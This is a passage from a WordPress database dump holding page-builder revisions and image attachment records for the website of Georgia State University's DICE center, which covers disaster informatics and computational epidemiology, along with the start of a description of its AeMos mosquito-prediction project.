gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n            <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c5\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n                      that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n                      partners; and local communities. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c9 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c10 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c11-outer\">\n            <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c12\" class=\"h-global-transition-all h-heading style-324 style-local-122-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-324 style-local-122-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Our Mission</h4>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"122-c13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c13 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c14-outer\">\n            <div data-colibri-id=\"122-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c14 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c15\" class=\"h-text h-text-component style-319 style-local-122-c15 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n                      to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c16\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c16 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c17\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c17 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c18-outer\">\n            <div data-colibri-id=\"122-c18\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c18 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c19-outer\">\n            <div data-colibri-id=\"122-c19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c20\" class=\"h-global-transition-all h-heading style-296 style-local-122-c20 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c20\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-298 style-local-122-c21 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-04-14 11:23:25','2022-04-14 15:23:25','',122,'https://gsudice.dataconn.net/?p=986',0,'revision','',0),(1006,1,'2022-04-14 11:57:50','2022-04-14 15:57:50','','sathwik 2','','inherit','open','closed','','sathwik-2','','','2022-04-14 11:57:50','2022-04-14 15:57:50','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/sathwik-2.jpg',0,'attachment','image/jpeg',0),(1007,1,'2022-04-14 11:58:03','2022-04-14 15:58:03','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg','cropped-sathwik-2-scaled-1.jpg','','inherit','open','closed','','cropped-sathwik-2-scaled-1-jpg','','','2022-04-14 11:58:03','2022-04-14 15:58:03','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg',0,'attachment','image/jpeg',0),(1021,1,'2022-04-14 12:05:06','2022-04-14 16:05:06','','sara','','inherit','open','closed','','sara','','','2022-04-14 12:05:06','2022-04-14 16:05:06','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/sara.jpg',0,'attachment','image/jpeg',0),(1022,1,'2022-04-14 12:05:11','2022-04-14 16:05:11','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sara.jpg','cropped-sara.jpg','','inherit','open','closed','','cropped-sara-jpg','','','2022-04-14 12:05:11','2022-04-14 16:05:11','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sara.jpg',0,'attachment','image/jpeg',0),(1049,1,'2022-04-14 13:52:20','2022-04-14 17:52:20','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Ryan.jpg','cropped-Ryan.jpg','','inherit','open','closed','','cropped-ryan-jpg','','','2022-04-14 13:53:21','2022-04-14 17:53:21','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Ryan.jpg',0,'attachment','image/jpeg',0),(1050,1,'2022-04-14 13:55:51','2022-04-14 17:55:51','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg','cropped-cropped-Ryan-e1649958770354.jpg','','inherit','open','closed','','cropped-cropped-ryan-e1649958770354-jpg','','','2022-04-14 13:55:51','2022-04-14 17:55:51','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Ryan-e1649958770354.jpg',0,'attachment','image/jpeg',0),(1093,1,'2022-04-14 16:22:32','2022-04-14 20:22:32','','Jean','','inherit','open','closed','','jean','','','2022-04-14 16:22:32','2022-04-14 20:22:32','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/Jean.jpg',0,'attachment','image/jpeg',0),(1094,1,'2022-04-14 16:23:12','2022-04-14 20:23:12','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg','cropped-Jean.jpg','','inherit','open','closed','','cropped-jean-jpg','','','2022-04-14 16:23:12','2022-04-14 20:23:12','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Jean.jpg',0,'attachment','image/jpeg',0),(1137,1,'2022-04-15 11:03:22','2022-04-15 15:03:22','','disaster1','','inherit','open','closed','','disaster1','','','2022-04-15 11:03:22','2022-04-15 15:03:22','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/disaster1.jpg',0,'attachment','image/jpeg',0),(1138,1,'2022-04-15 11:03:37','2022-04-15 15:03:37','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-disaster1-scaled-1.jpg','cropped-disaster1-scaled-1.jpg','','inherit','open','closed','','cropped-disaster1-scaled-1-jpg','','','2022-04-15 11:03:37','2022-04-15 15:03:37','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-disaster1-scaled-1.jpg',0,'attachment','image/jpeg',0),(1139,1,'2022-04-15 11:03:42','2022-04-15 15:03:42','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c11\",\"parentId\":\"122-c10\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c11\",\"index\":0,\"id\":\"122-c12\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c10\",\"parentId\":\"122-c9\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c15\",\"parentId\":\"122-c14\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning<\\/p>\"}}],\"id\":\"122-c14\",\"parentId\":\"122-c13\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c9\",\"index\":0,\"id\":\"122-c13\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c9\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c18\",\"parentId\":\"122-c17\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c19\",\"parentId\":\"122-c17\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c19\",\"index\":0,\"id\":\"122-c20\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c19\",\"index\":2,\"id\":\"122-c21\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-04-15 11:03:42','2022-04-15 15:03:42','',353,'https://gsudice.dataconn.net/?p=1139',0,'revision','',0),(1140,1,'2022-04-15 11:03:42','2022-04-15 15:03:42','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n            <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c5\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n                      that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n                      partners; and local communities. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c9\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c9 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c10\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c10 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c11-outer\">\n            <div data-colibri-id=\"122-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c12\" class=\"h-global-transition-all h-heading style-324 style-local-122-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-324 style-local-122-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Our Mission</h4>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"122-c13\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c13 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c14-outer\">\n            <div data-colibri-id=\"122-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c14 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c15\" class=\"h-text h-text-component style-319 style-local-122-c15 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The Center for Disaster Informatics and Computational Epidemiology (DICE) is a catalyst for collaboration among scientists and practitioners from diverse domains to develop data-driven, computational methodologies that facilitate research\n                      to address challenges and disparities in Disaster Mitigation, Public Health, and Response Planning</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c16\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c16 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c17\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c17 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c18-outer\">\n            <div data-colibri-id=\"122-c18\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c18 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c19-outer\">\n            <div data-colibri-id=\"122-c19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c20\" class=\"h-global-transition-all h-heading style-296 style-local-122-c20 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c20\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-298 style-local-122-c21 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-04-15 11:03:42','2022-04-15 15:03:42','',122,'https://gsudice.dataconn.net/?p=1140',0,'revision','',0),(1153,1,'2022-04-18 11:49:17','2022-04-18 15:49:17','','BeforeSimulCast','','inherit','open','closed','','beforesimulcast','','','2022-04-18 11:49:17','2022-04-18 15:49:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/BeforeSimulCast.png',0,'attachment','image/png',0),(1154,1,'2022-04-18 11:49:37','2022-04-18 15:49:37','https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-BeforeSimulCast.png','cropped-BeforeSimulCast.png','','inherit','open','closed','','cropped-beforesimulcast-png','','','2022-04-18 11:49:37','2022-04-18 15:49:37','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-BeforeSimulCast.png',0,'attachment','image/png',0),(1156,1,'2022-04-18 11:50:05','2022-04-18 15:50:05','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c4\",\"parentId\":\"126-c3\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c4\",\"index\":0,\"id\":\"126-c5\",\"partialId\":126,\"styleRef\":342,\"type\":\"content\",\"props\":{\"content\":\"AeMos: An Early Warning Systems for Aedes Mosquito Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c4\",\"index\":2,\"id\":\"126-c6\",\"partialId\":126,\"styleRef\":344,\"type\":\"content\",\"props\":{\"content\":\"<p>The Aedes Mosquito is a prolific vector for diseases and can cause severe outbreaks that heavily affect human populations and overwhelm healthcare systems. Outbreaks of these diseases can often be traced back to climate patterns that are favorable for mosquito population growth. Predicting these outbreaks early is essential to 